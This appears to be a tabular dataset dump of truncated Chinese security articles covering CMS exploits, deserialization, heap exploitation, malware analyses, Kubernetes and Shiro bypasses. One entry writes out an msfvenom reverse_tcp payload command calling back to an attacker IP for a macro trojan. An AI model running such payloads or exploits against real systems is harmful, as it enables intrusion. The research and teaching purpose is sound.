text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
### 域内批量获取敏感文件
>
> 域内如果我们要获取指定机器,恰巧那台机器为linux只开了22等端口或者说无法从常规web打点进入,我们可以寻找运维机器的密码本,一台一台翻的话成本太高,就可以通过批量获取域内桌面文件。
### 0x01 批量获取域内机器名
自动化工具,当然就要全自动,懒人必备。`net group "domain computers" /do`
,获取机器是3个一排,然后可以通过正则删除空格,每次也麻烦,直接获取机器名更加方便。
思路就是连接ldap然后指定过滤条件`(&(objectclass=computer))`获取机器。
**获取域内机器**
public static DirectoryEn... | 社区文章 |
# 针对使用Doppelgänging技术的SynAck勒索软件变种的分析
##### 译文声明
本文是翻译文章,文章来源:https://securelist.com/
原文地址:<https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
2017年12月,在BlackHat会议上,新型代码注入技术Process Doppelgänging被首次发布(
<https://www.blackhat.com/docs/eu-17/materials/eu... | 社区文章 |
# 【技术分享】CmsEasy前台无限制GetShell
|
##### 译文声明
本文是翻译文章,文章来源:阿里先知(安全情报)
原文地址:<https://xianzhi.aliyun.com/forum/read/215.html>
译文仅供参考,具体内容表达以及含义原文为准。
**简要描述**
CMSEasy官方在2016-10-12发布了一个补丁,描述只有两句话
前台getshell漏洞修正;
命令执行漏洞修正;
我们就根据补丁来分析一下这个前台Getshell漏洞。
**漏洞详情**
在补丁页面[http://www.cmseasy.cn/patch/show_1116.html下载补丁CmsEasy_for_Upl... | 社区文章 |
**Author: p0wd3r (知道创宇404安全实验室)**
**Date: 2017-04-13**
## 0x00 漏洞概述
### 漏洞简介
昨天 phpcms 发布了 9.6.1
版本,这次补丁中修复了两个安全漏洞([任意文件上传](http://paper.seebug.org/273/)和SQL注入), 相比于任意文件上传,这个
SQL 注入虽然没那么简单粗暴,但攻击思路还是值得我们学习。
### 漏洞影响
SQL 注入
版本:9.6.0
## 0x01 漏洞复现
首先我们看`phpcms/modules/attachment/attachments.php`中的`swfupload_json`函数:
这里... | 社区文章 |
# PHP7:反序列化漏洞案例及分析(上)
|
##### 译文声明
本文是翻译文章,文章来源:安全客
原文地址:<http://blog.checkpoint.com/2016/08/26/web-scripting-language-php-7-vulnerable-to-remote-exploits/>
译文仅供参考,具体内容表达以及含义原文为准。
**
**
****
**1.漏洞历史**
对于黑客来说,如果能够利用服务器端错误,那简直相当于中了头彩。因为用户倾向于将他们的数据保存在服务器中,如果黑客能够利用这个错误,就能针对某一个目标,从而获取更大的收益。PHP脚本语言是时下最流行的web服务器端语言。为了消除PHP... | 社区文章 |
# 听说安全圈也有CPU了?
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
**发现了吗?**
**对于众多数字化企业来说**
**安全设备“量变”容易**
**安全能力“质变”难!**
**你以为的安全**
买买买,串糖葫芦式的设备叠加环境
真实的安全现状
设备没能有效利用
挡不住安全威胁,企业成本浪费
投入大量人力、财力
安全效果还是不尽如人意
到底为什么?
## 问题一:缺乏全局视野
缺乏对安全内涵及外延的认知
就像站在瞭望塔底部
眼前的黑不是黑
眼前的白不是白
## 问题二:各方情报难以融汇统一
缺乏有效整合的情报信息
导致可利用价值大打折扣
只见树木,不见森林
并没有真正实现“防患于未... | 社区文章 |
## 前言
参考网上的一篇文章教程,复现了一下 wget 1.19.1 组件版本的的一个栈溢出漏洞。漏洞的成因是由于对响应包处理不当导致的整数溢出,进而导致栈溢出。
## 环境准备
sudo apt-get install libneon27-gnutls-dev
wget https://ftp.gnu.org/gnu/wget/wget-1.19.1.tar.gz
tar zxvf wget-1.19.1.tar.gz
### 编译
cd wget-1.19.1/
mkdir build/ & ./configure --prefix=$PWD/build/
make -j8
##... | 社区文章 |
最近工作之余发现虚拟机里存有之前下载的POSCMSv3.2.0,这个CMS系统去年底被爆出漏洞,当时读了参考文章1的博客后很想复现一下,却因别的事耽搁了。这次抽空复盘一下,详情见下文。P.S.源码请戳附件。
## 安装环境
本次复盘系统部署在CentOS虚拟机中,版本信息如下:
OS: CentOS7 amd64 (IP:10.10.10.129)
PHP: 5.5.38
MySQL: 5.5.60
WebServer: Apache2.4.6
软件版本:2018.11.27 v3.2.0
对应这个版本支持的PHP不得高于7.1,这里只好对系统默认安装版本降级:
yum list instal... | 社区文章 |
本人大三准备写计算机安全毕业设计求想法,主要想复试的时候能通过毕业论文多加几分,用python写。我学过的(多线程多进程
扫描器(外接nmap…内置shell工具) 网络编程 下载等待界面 对话框 爬虫(内置浏览器) 文件处理 mysql
错误调试 逆向 密码学(绕waf))
目前能想到的武器库....学的多但是不深。求想法
暑假准备去实习,动手的话应该是在大四上学期 | 社区文章 |
# 34c3ctf-v9
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
结合Turbolizer来分析34c3ctf-v9的v8逃逸题
## 0x01 patch分析
diff --git a/src/compiler/redundancy-elimination.cc b/src/compiler/redundancy-elimination.cc
index 3a40e8d..cb51acc 100644
--- a/src/compiler/redundancy-elimination.cc
+++ b/src/compiler/r... | 社区文章 |
# 逆向学习笔记之dll注入
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 概念
DLL注入指的是向运行中的其他进程强制插入特定的DLL文件。从技术细节来说,DLL注入命令其他进程自行调用LoadLibrary()
API,加载用户指定的DLL文件。DLL注入与一般DLL加载的区别在于,加载的目标进程是自身或其他进程。
可以简单理解为把你想执行的代码写在dll文件里,然后注入目标进程执行代码。
## 具体场景
dll的应用场景有很多,比如改善功能与修复bug,消息钩取,API钩取,恶意代码等场景,这里我将dll注入用于黑盒测试,方便理解dll注入的功能。
在一些比较复杂的程序里,特别是一... | 社区文章 |
# 0x00 环境:
攻击机:unbuntu metasploit
靶机:windows 10
Word(能开启宏的版本均可)
SimpleHTTPServer(上传可执行文件以供下载,或者上传到www.upload.ee或其他网站再下载也可)
# 0x01 msfvenom生成木马文件
#msfvenom -p windows/meterpreter/reverse_tcp lhost=10.101.112.222 lport=4144 -a x86 -f exe > /var/tmp/Twe1ve.exe
生成exe格式文件到指定的/var/tmp/目录下
# 0x02 开启SimpleHTTPServer
... | 社区文章 |
Apache
Shiro的CVE-2020-11989修补补丁依旧存在缺陷,由于shiro和spring在处理url中仍然存在差别,通过构造特殊的HTTP请求,可以再次绕过授权,访问未授权的信息。
**影响范围**
Apache Shiro < 1.6.0
Spring 框架中只使用 Shiro 鉴权
**漏洞复现**
配置如下
@Bean
ShiroFilterFactoryBean shiroFilterFactoryBean(){
ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
... | 社区文章 |
### 0x01
[题目地址](https://command-executor.hackme.inndy.tw/index.php)
首先打开页面,发现导航栏中有几个选项。每个都点了一下之后,发现其用处。
* `Man`:用来列出相关命令的文档
url:`index.php?func=man`
* `Tar Tester`:用来测试上传的tar文件
url:`index.php?func=untar`
上传文件`1.tar`测试
这里的`tar -tvf`并不会将文件解压到某个位置,所以没有什么可以利用的点。
* `Cmd Exec`:用来执行命令并返回结果
url:`index.php?func=cm... | 社区文章 |
# 如何利用三个漏洞组合达成Discord RCE漏洞
|
##### 译文声明
本文是翻译文章
原文地址:<https://mksben.l0.cm/2020/10/discord-desktop-rce.html>
译文仅供参考,具体内容表达以及含义原文为准。
## Discord桌面应用RCE漏洞
几个月之前,我挖掘出了Discord的一个RCE漏洞,并向他们的src报告了这个漏洞。
这次我找到的RCE漏洞比较有趣,因为这个漏洞是通过组合多个漏洞实现的。在本文中,我会分享该漏洞的挖掘细节。
注:Discord是一款专为社区设计的免费网络实时通话软件与数字发行平台,主要面向游戏玩家、教育人士及商业人士,用户之间可以在软体的聊天频... | 社区文章 |
# 从虎符2021两道Pwn题学习ARM64
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 通过对虎符CTF 2021中两道pwn题的详细分析,来学习Arm64的相关知识
## 简介
这两个Pwn都是基于aarch64的,而且都采用了混淆,看不出题目本来的逻辑,Ghidra干脆啥都看不出来,ida可以看汇编,因此建议读者先学一下aarch64汇编,对常用指令有基本的认识
* <https://www.jianshu.com/p/b9301d02a125>
* <https://ayesawyer.github.io/2019/08/26/arm%E6%B1%87%E7%BC%96... | 社区文章 |
# 【系列分享】Linux 内核漏洞利用教程(二):两个Demo
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
****
作者:[o0xmuhe](http://bobao.360.cn/member/contribute?uid=32403999)
预估稿费:400RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**传送门**
[**【系列分享】Linux 内核漏洞利用教程(一):环境配置**
****](http://bobao.360.cn/learning/detail/3700.html)
**
**
**... | 社区文章 |
**作者: 安天CERT
公众号:[震网事件的九年再复盘与思考](https://mp.weixin.qq.com/s?__biz=MjM5MTA3Nzk4MQ==&mid=2650173867&idx=1&sn=6b12446b10650f6c00784a63d3c486fb&chksm=beb9d29989ce5b8facbbad4c31886e98184461da5ced81e802a4f1c5e7c90f36c45d8e594de6&mpshare=1&scene=1&srcid=&sharer_sharetime=1570502559868&sharer_shareid=bafb2678ed1f77a340809d0b... | 社区文章 |
# 【技术分享】一道简单内核题入门内核利用
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
****
作者:[anciety](http://bobao.360.cn/member/contribute?uid=2806750221)
预估稿费:400 RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**前言**
对于学过用户空间pwn的同学来说,内核一直是向往但是却不知道如何下手的一个地方,最近的CISCN比赛中出现了一道内核的基础题目,我认为是一道非常适合内核入门的一道题目,所以我就这道题目,通过自己的分析,希望让大... | 社区文章 |
## 【10.11更新】先知安全技术社区`"企业安全建设"`文章奖励计划!!!
【4.25更新】先知安全技术社区"CVE原创分析”文章奖励丰厚!
【4.13更新】先知安全技术社区"勒索软件类"和“机器学习、人工智能、算法”相关文章奖励翻多倍!
### 1、征集文章类型:
* 勒索软件类:和勒索软件相关的文章,包括勒索软件的样本分析、勒索软件相关情报、勒索软件相关的数据分析和统计(如影响服务器或终端数);以及对应勒索软件的解决方案。
* 算法类:基于算法、人工智能相关的安全检测、防护相关文章,鼓励提出新的思路。
### 2、投稿方式:
* 直接右上角`【个人中心】`-`【创建新帖子】`-`【节点模块】`选择`【技术文章】`... | 社区文章 |
# Black Hat USA 2018 Arsenal | GhostTunnel解读
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:360无线电安全研究院
## 1\. 前言
今年是360无线电安全研究院第四次登上世界顶级的安全会议Black
Hat,继4月份的HITB阿姆斯特丹站后,来自天马安全团队的柴坤哲、曹鸿健,王永涛带来的GhostTunnel再次入选了以“议题审核严苛”著名的 Black
Hat USA 2018,据悉,该会议议题接受率不足20%。
Ghost
Tunnel是一种可适用于隔离环境下的后门传输方式。一旦payload在目标设备释放后,可在用户无感知情况下对目标进... | 社区文章 |
## 影响范围
* jackson-databind before 2.9.10.3
* jackson-databind before 2.10.2
## 利用条件
开启enableDefaultTyping()
## 漏洞概述
漏洞类javax.swing.JEditorPane来源于JDK不需要依赖任何jar包,该类在jackson-databind进行反序列化时可造成SSRF
## 漏洞复现
### 环境搭建
pom.xml文件如下:
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</group... | 社区文章 |
看到运维群里的小伙伴都在研究k8s,而且在国内这方面的安全资料非常的少,所以才有了我这篇文章。
所以接触k8s以来也就一个星期时间,把大部分概念简单的理解下就去复现各种关于k8s安全相关的问题。
### Kubernetes架构
`Kubernetes Cluster`是Master的大脑,运行着的Daemon服务包括 **kube-apiserver** 、 **kube-scheduler** 、 **kube-controller-manager** 、 **etcd** 、 **Pod网络(flannel)**
#### Master组件
**API Server**
提供 **HTTP/HTTPS RESTful ... | 社区文章 |
访问`/robots.txt`,下载parse文件
拖到IDA里一看函数名,发现是GO语言的二进制文件
strings一下发现一些奇怪的字符串
/var/log/nginx/dot.access.log
cat /tmp/test.txt | awk -F ' "' '{print $NF}' >> /tmp/data.txt ;echo '' > /tmp/test.txt
关于dot
server,搜到这样一篇文章:<https://www.cnblogs.com/yjf512/p/3773196.html,所以确定了服务器的用途>
在题目源码中看到
var ajax = new XMLHttpReque... | 社区文章 |
最近工作中遇到了点Linux方面的应急响应问题,因为本人比较菜,所以掌握的知识点也不是很多。论坛既然开个讨论版块,那我就把我自己在响应过程中的一点排查思路发出来,希望大家踊跃跟帖,提出不同的观点和技术。
1.bash_history记录
通常的Linux服务器在遭遇到入侵后,我的第一时间会去查看.bash_history文件,如图所示:
正常的操作系统里面有pentest(渗透测试)之类的字眼,一般来说,是黑客拿来做跳板机用的,便可以一目了然的知道这台服务器有没有被入侵,大大的提高了运维人员的排查效率
[
当然,`.bash_history`能提供给我们的信息量很大,在这只是仅仅的一些举例。
2.last、lastb... | 社区文章 |
# 2月28日安全热点 - SAML漏洞/利用Memcache Server进行DDoS攻击
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 资讯类
SAML漏洞可让攻击者以其他用户身份登录
<https://www.bleepingcomputer.com/news/security/saml-vulnerability-lets-attackers-log-in-as-other-users/>
<https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations>
<http://... | 社区文章 |
# 老树开新花--njRAT家族恶意软件分析报告
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
近日,360CERT监测到“njRAT”家族恶意软件的新型变种正在活跃,该木马家族使用.NET框架编写,并且本文中所讲的样本带有严重代码混淆妨碍安全人员分析。
njRAT又称Bladabindi,是一个插件化的远控木马程序,由于木马简单易学,大大降低了利用门槛,在该团伙的恶意利用过程中,我们总结出以下特点:
恶意载荷层层加密存储
> 解密流程可控
>
> 代码混淆,做了较强anti reverse
>
> 全局字符串加密存储
>
> 具备勒索软件能力(新功能)
>
> 盗取数字货币(新功能... | 社区文章 |
**作者:标准云
本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org**
## 漏洞简介
Apache Commons Text 执行变量插值 (variable interpolation),
允许动态评估和扩展属性。插值的标准格式是`"${prefix:name}"`,其中 "prefix" 用于查找定位执行插值
`org.apache.commons.text.lookup.StringLookup` 的实例。从 1.5 版到 1.9 版,默认的 Lookup
实例集包括可能导致任意代码执行或与远程服务器联系的插值器。
* "script" - e... | 社区文章 |
### 前言
* * *
每个月都得学点什么,以前对Dom Xss
只有一个模糊的印象,就是看不懂。在xss中,分为反射型,存储型和DOM型XSS,而且难以防范,在[安全小课堂](https://www.secpulse.com/archives/92286.html)中,Camaro师傅就介绍过Dom
Xss的优势:
* 避开waf
因为有些情况Dom
Xss的Payload,可以通过`location.hash`,即设置为锚部分从`#`之后的部分,既能让JS读取到该参数,又不让该参数传入到服务器,从而避免waf检测。`location.search`也类似,它可以把部分参数放在`?`之后的部分。
* 长度不限
这个很重要... | 社区文章 |
# 攻击代码指针完整性
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
代码指针完整性(CPI,更详细的介绍可以参考我之前的[文章](https://www.anquanke.com/post/id/193818))是2014年提出的一种针对控制流劫持攻击的防御措施,CPI将进程内存划分为安全区和常规区,对敏感指针,尤其是代码指针放置到安全区做了保护。其作者认为该机制能够对控制流劫持攻击实现完全的防御,但遗憾的是,CPI(主要指基于信息隐藏的实现)做了两个并不总是成立的假设:
1. 安全区的信息不会被泄露。
2. 对安全区的暴力破解将会导致程序出现崩溃。
而实际上,安全区的信息可能被泄... | 社区文章 |
这是内核漏洞挖掘技术系列的第十四篇。
第一篇:[内核漏洞挖掘技术系列(1)——trinity](https://xz.aliyun.com/t/4760
"内核漏洞挖掘技术系列\(1\)——trinity")
第二篇:[内核漏洞挖掘技术系列(2)——bochspwn](https://xz.aliyun.com/t/4800
"内核漏洞挖掘技术系列\(2\)——bochspwn")
第三篇:[内核漏洞挖掘技术系列(3)——bochspwn-reloaded(1)](https://xz.aliyun.com/t/4921
"内核漏洞挖掘技术系列\(3\)——bochspwn-reloaded\(1\)")
第四篇:[... | 社区文章 |
Author: **jmpews(知道创宇404安全实验室)**
本文涉及到的相关资料可以参考 :https://github.com/jmpews/pwn2exploit/
关于堆的分配原理我觉的这篇文章
[《glibc内存管理ptmalloc源代码分析》](http://paper.seebug.org/papers/Archive/refs/heap/glibc%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86ptmalloc%E6%BA%90%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90.pdf)
已经说得很详细。但是我尽力用 glibc 源码和自己的理解总结去概述, 本文章在... | 社区文章 |
在这个星期二的上午,我旁边的一位表哥正在对都是登陆页面的资产表进行疯狂的测试,脸上的表情越来越焦灼,越来越痛苦,这时急促的电话铃声响了起来,表哥接到电话后,眉头一紧,嘴中连连冒出虎狼之词,我微笑的看着他,知道出事了,离奇的是好像是被“0day”给干了一顿鼻青脸肿,对面渐渐有了哭腔,看来是找了很久都没有发现突破口,我又大笑了笑接过了电话,原来是客户的财务服务器被勒索病毒给搞了,屏幕上大大的骷髅头十分恐怖,如下图所示很简单的一个网络架构,而且对外只开了3389端口(当然这只是管理员的说辞)。
实际上扫了一下,emmmmm(但愿是防火墙的规则导致吧)
客户的搭建架构是CS架构,也就是客户端和服务端,首先怀疑的可能性是钓鱼,这是勒索... | 社区文章 |
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。项目地址:<https://github.com/c0ny1/upload-labs>2019年1月13日添加了第20关。测试环境:
> PHP/5.6.27
> Apache/2.4.23
> windows
### Pass-01-js检查
这种直接禁用JS,或者burp改包等等都可以。
### Pass-02-只验证Content-type
$is_upload = false;
$msg = null;
i... | 社区文章 |
几个月前我突发奇想地写了个密码管理工具,今天又更新了点功能,于是想跟各位大牛探讨一下,如果想要自己设计密码管理系统或者工具,应该怎么做比较安全?
先分享下我自己设计的密码管理工具,以下内容来自个人博客:<http://thief.one/2017/04/24/1/>
### 设计思路
首先作为一个密码管理工具,得有3个最基础的功能,密码生成、密码存储以及密码查询。
#### 密码生成
原本想借助于AES算法的,但是实际编写过程中出了点状况,因此改用base64(进过特殊处理)。
当然用来加密明文密码不可能只用简单的base64,其中经过多次复杂的转换,并且生成的密码存在一定随机性,不易发现规律。
#### 密码存储
原本是想搞个... | 社区文章 |
# Spring Interceptor 内存马分析
## demo
创建如下Intercetor:
package com.example.demo;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.ModelAndView;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class M... | 社区文章 |
## 前言
渣渣一枚,萌新一个,会划水,会喊六六
个人博客:<http://www.cnblogs.com/miraitowa/>
再过几天就是中秋节了,我打算尽自己最大的能力把蓝鲸安全平台上面的打卡题目的`writeup`整理出来。
有什么错误的地方 希望各位大佬指正(谢谢Orz)
### 一:检查符号
#### 知识点
摩斯密码、替换密码
#### 解题思路
这道题很容易就可以看出是摩斯密码 摩斯密码就是由`'.'`和`'-'`组成的密码 先丢在`notepad++`里转换下
把`。`换成 空格
把`o`转换成`.`
把`0`转换成`-`
就会得到:`....- --- ... .--- -.... -. -.-- --. --... | 社区文章 |
# Glibc-2.23 源码分析——free部分下
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
终于抽出时间对glibc动态内存管理部分源码进行初略的探究,试着从源码和动调来分析free函数执行过程和一些pwn的攻击技巧,分析的不是很全面,有错误的地方望提出指正,共同进步。ps:欢迎白帽子们关注
涂鸦智能安全响应中心
* * *
### Mmap 处理
#### 释放mmap空间内存
测试代码
断点于free
__libc_free()中Mmap_free处理代码
之后进入 mummap_chunk() 释放 mmap区域
### malloc_consolidate函数... | 社区文章 |
**作者:riusksk
公众号:[漏洞战争](https://mp.weixin.qq.com/s/WrSZpqgq6gvZwEIqghqggg "漏洞战争")**
_注:本文为原文上下篇合集_
在上篇文章[《推荐今年C3黑客大会上的几个议题》](https://mp.weixin.qq.com/s?__biz=MzU0MzgzNTU0Mw==&mid=2247483908&idx=1&sn=9c99e59f416236ae3ace958252163991&chksm=fb0416fccc739feaaa457bd2c6723c36581b52d0c13914c9658cce4cbc56e42b360a3f703350&sce... | 社区文章 |
# ShadowMove:隐蔽的横向移动策略
|
##### 译文声明
本文是翻译文章,文章原作者 Amirreza Niakanlahij,Jinpeng WeiMd,Rabbi Alam,Qingyang Wang,Bei-Tseng Chu,文章来源:29th USENIX Security Symposium
原文地址:<https://www.usenix.org/conference/usenixsecurity20/presentation/niakanlahiji>
译文仅供参考,具体内容表达以及含义原文为准。
高级持续威胁(APT)攻击使用各种策略和技术在进入奖励环境中横向移动。但是,现有的策略和技术具有局限性,例... | 社区文章 |
## 前言
在刚结束的ByteCTF的中,@f1sh师傅出了一道bypass php
disable_functions的题目,预期解是通过web的方式,在有putenv的情况下,无需mail/imagemagick等组件,用一种新的方式实现bypass。
最终在和@Yan表哥讨论后,我们找到了题目的预期解法--iconv,这篇文章记录一下在解题过程中我们尝试过的各种思路,比如线上赛的exception类非预期、利用php
bugs中的一些uaf(向Kirin爷爷学习)、直接写/proc/self/mem、其他pwn/web的姿势。这里膜一下@Sndav师傅,通过一个pwn的洞实现php5-8通杀,降维打击非预期,orz
## ... | 社区文章 |
# 【漏洞分析】Struts2高危漏洞S2-048分析
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**作者: n1nty**
本次漏洞触发点在:
org.apache.struts2.s1.Struts1Action.execute() 方法中,如下图所示。
org.apache.struts2.s1.Struts1Action 类为一个 Wrapper 类,用于将 Struts1 时代的 Action 包装成为
Struts2 中的 Action,以让它们在 struts2 框架中继续工作。
在 Struts1Action 的 execute 方法中,会调用对应的 S... | 社区文章 |
## Canadian FOI(50)
> The university has this Freedom Of Information Portal. You should check it
> out. To the portal
题目通过url <http://foi.uni.hctf.fun/docs/document_001.pdf>
访问300张pdf
批量获取脚本
from os.path import join
import requests
URL = "http://foi.uni.hctf.fun/docs/"
PATH = "~/"
i = 1
while(i ... | 社区文章 |
# 不出网主机上线方法
## 测试环境
假设192.168.111.0/24为公网ip段,192.168.204.0/24为内网ip段
### web服务器 Windows 2008 r2
DMZ主机 虚拟机两块网卡一块设置为NAT模式,一块设置为HOSTONLY模式,可通外网
公网ip:192.168.111.132
内网ip:192.168.204.188
### 内网主机 Windows 2012
虚拟机网卡设置HOSTONLY模式,不通外网
内网ip:192.168.204.141
### C2: Kali Linux
公网ip:192.168.111.129
## 1.SMB beacon
SMB
Beacon使用命名... | 社区文章 |
## 前言
前段时间挖了不少跟mt_rand()相关的安全漏洞,基本上都是错误理解随机数用法导致的。这里又要提一下php官网manual的一个坑,看下关于mt_rand()的介绍:中文版1
英文版2,可以看到英文版多了一块黄色的 **Caution** 警告
> This function does not generate cryptographically secure values, and should
> not be used for cryptographic purposes. If you need a cryptographically
> secure value, consider using random_... | 社区文章 |
### Discuz介绍
Crossday Discuz! Board(简称
Discuz!)是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。自2001年6月面世以来,Discuz!已拥有15年以上的应用历史和200多万网站用户案例,是全球成熟度最高、覆盖率最大的论坛软件系统之一。目前最新版本Discuz!
X3.2正式版于2015年6月9日发布,首次引入应用中心的开发模式。2010年8月23日,康盛创想与腾讯达成收购协议,成为腾讯的全资子公司。(摘自百度百科)
Discuz代码非常灵活,支持自定义模板和插件,这让Discuz拥有了极强的diy性,再加上操作简单快捷,入门门槛低,使得这款开源软件在中国发展异常迅猛,成... | 社区文章 |
# 【知识】11月5日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要:
流行的动漫网站Crunchyroll.com被劫持用于传播恶意软件(分析报告)、2018年恶意软件预测、对IoT_Reaper已有分析的细节补充、Ladon
Webservice(<=0.9.40)的XXE、tnftp
"savefile"任意命令执行、Splunk本地提权、fridump:基于Frida的通用内存dump工具、OpenSSl修复了两个漏洞、Kernelpop:内核提权exploit框架**
资讯类:
流行的动漫网站Crunchyroll.com被劫持... | 社区文章 |
# house of banana
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 前言
总结出的一种新型堆利用手法,适用于目前所有的glibc版本,我暂且命名它为house of banana~。
## 0x02 新版glibc的改进
从glibc 2.28开始,_int_malloc中增加了对unsorted bin的bk的校验,使得unsorted bin attack变得不可行。
/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != vict... | 社区文章 |
## 引言
CFI已经被确定为漏洞利用缓解的一个标准,并有了许多不同的实现,如Microsoft CFG2,Microsoft RFG3,PaX Team 的
RAP™4 和 Clang 的 CFI5。 在本系列文章中,我们将演示如何绕过现代CFI实施。
具体来说,在这篇文章中,我们将演示一种高级代码重用技术,伪造面向对象编程(COOP)来利用启用CFI保护的旧漏洞。
## 漏洞
CVE-2015-5122是Hacking Team用于利用Adobe Flash Player(<= 18.0.0.203)的 UAF 漏洞。
可以在[这里](https://blog.trendmicro.com/trendlabs-security-... | 社区文章 |
# ysoserial CommonsBeanutils1 & Click1 详细分析
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
CommonsBeanutils1 是一条比较古老的反序列化利用链,今年出的新利用链Apache
Click1与之非常相似,同时填补在上篇文章中留的坑,解决openAM反序列化利用链构造问题。
## 0x00 思考
分析完CommonsCollections系列利用链后对Java反序列化利用链有了更深层次的认识。其实Java与PHP的反序列化有着相同的地方,我们把
**填充了特定属性的类** 作为点,把 **类之间的方法调用**
作为线,这样线可以去连接点,完... | 社区文章 |
# 0x00 疑问
* * *
一直在用mysql数据库报错注入方法,但为何会报错?
百度谷歌知乎了一番,发现大家都是把官网的结论发一下截图,然后执行sql语句证明一下结论,但是没有人去深入研究为什么rand不能和order
by一起使用,也没彻底说明三者同时使用报错的原理。
# 0x01 位置问题?
* * *
`select count(*),(floor(rand(0)*2))x from information_schema.tables group by
x;` 这是网上最常见的语句,目前位置看到的网上sql注入教程,`floor` 都是直接放`count(*)`
后面,为了排除干扰,我们直接对比了两个报错语句,如下图
由... | 社区文章 |
一个很抽象的漏洞
## 原理
源码截取自glibc-2.27/malloc/malloc.c:3729
该段代码的功能就是在`unsorted bin`中找到与malloc的chunk相匹配的chunk,如果不匹配就把该`unsorted
bin`放回到它对应的bin中,利用点就在这段代码里面。
for (;; )
{
int iters = 0;
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk... | 社区文章 |
# WebPageTest
WebPageTest是一款非常专业的 Web
页面性能分析工具,它可以对检测分析的环境配置进行高度自定义化。2022年9月23日互联网上公开WebPageTest的多个漏洞。攻击者可利用runtest.php,构造恶意请求触发phar反序列化,执行任意代码控制服务器。同时可以借助jeeginfo.php触发ssrf漏洞,从而扫描内网获取敏感信息。本次要分析的两个漏洞源于阿里云漏洞库,编号分别为AVD-2022-1474319和AVD-2022-1474320。
## [AVD-2022-1474319](https://avd.aliyun.com/detail?id=AVD-2022-1474319)... | 社区文章 |
**作者:xxhzz@星阑科技PortalLab
原文链接:<https://mp.weixin.qq.com/s/zVYQQgDjcwJKAnX8SZJ5Cw>**
# **漏洞描述**
5 月 18 日,VMware 发布了一份公告 ( VMSA-2022-0014 ),以解决多个 VMware
产品中的两个漏洞,其中包括CVE-2022-22972,该漏洞在身份认证处理时存在一定缺陷。远程攻击者可通过伪造相关请求信息来绕过身份验证,从而获取相关应用程序的管理权限。
# **相关介绍**
VMware是一家提供全球桌面到数据中心虚拟化解决方案的厂商,其推出的产品包括我们最熟悉的VMware
Workstation,一款桌面虚... | 社区文章 |
# HackTheBox Cyber Apocalypse 2021 CTF:Oldest trick in the book
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 数字取证题目Oldest trick in the book
大家好我是来自Tiger-Team的evi1_f4iry,近期刚刚和小伙伴们组队TigerEyes,完成了为期一周的Cyber Apocalypse
2021 CTF线上赛,队伍最终排名第15。
我将陆续在此分享一些我在队伍中负责解出的题目,本文为取证题Oldest trick in the book。
### 题目信息
Oldest trick in ... | 社区文章 |
## 写在文前
从实习到现在,因为从事打点工作的原因,实战经验积累了很多,就想写一些自己在实战中碰到的问题,以及自己的解决方法,因为保密的原因大多数不提供复现环境和截图,权当对渗透思路的一个拓展吧。可能会多写几篇,也可能因为实战经验不足就此荒废这个系列。总之看心情和时间安排吧。
## 注入的几个问题
SQL注入所涉及到的东西无非就以下几方面
1. 哪里会经常出现注入
2. bypass waf
3. 如何快速定位重要数据表
4. 大数据表托数据
5. 注入读写文件
6. 执行命令
## 哪里经常出现注入
要想利用注入,首先你得挖到一个注入点,在大多数的业务场景中,搜索框是一个容易出现注入的地方,他们的SQL语... | 社区文章 |
# **简介**
信息安全工作场景很多,这里针对个人的一个工作场景自制一个日志分析工具。
在应急响应的时候如何从大量web日志中寻找和提取有用信息是我工作中所遇到的一个痛点。学习众多道友分享的文章后自己也做了一些总结,整理后编写了一个日志检测和信息提取的工具
logC ,下面将对web日志分析和该工具的使用分享自己的一些心得和方法。
# **web日志**
日志有很多,接触最平凡的莫过于web日志。web日志主要出自nginx、IIS、tomcat、apache、weblogic等等(容器)中间件。每种中间件都支持自定义日志输出,大部分都是使用默认配置进行输出,所以这些中间件吐出的日志都很多共同信息,从安全角度或应急的特殊环境再... | 社区文章 |
# 【病毒分析】新勒索病毒变种GlobeImposter(江湖骗子)分析
